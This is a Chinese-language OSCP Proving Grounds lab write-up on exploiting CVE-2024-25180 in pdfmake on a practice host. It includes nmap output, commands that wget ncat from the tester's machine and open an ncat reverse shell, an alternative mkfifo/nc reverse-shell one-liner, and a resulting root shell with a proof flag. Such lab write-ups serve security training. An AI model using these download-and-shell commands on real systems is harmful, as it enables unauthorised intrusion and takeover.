OSCP - Proving Grounds - CVE-2024-25180

主要知识点

• 相关cve漏洞利用

具体步骤

nmap开始两个端口开放，22和1234

Nmap scan report for 192.168.54.42
Host is up (0.00069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
1234/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

其中1234端口开放了一个pdfmake,虽然不知道具体的版本，不过google一下 发现CVE-2024-25180排名比较靠前，于是尝试一下Arbitrary Code Injection in pdfmake | CVE-2024-25180 | Snyk

将PoC中的CMD替换成下面的命令依次执行

1. wget 192.168.45.225:8000/ncat -O /tmp/ncat
2. chmod +x /tmp/ncat
3. /tmp/ncat -e /bin/bash 192.168.45.225 80

反弹shell就会被创建，这里其实有别的方法，不用这么麻烦，一条命令 rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc192.168.45.225 80>/tmp/f 也可以

C:\home\kali\Documents\OFFSEC\GoToWork\CVE-2024-25180> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.225] from (UNKNOWN) [192.168.216.42] 51610
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
304d16aa1f75f007766dafa3eed9ec03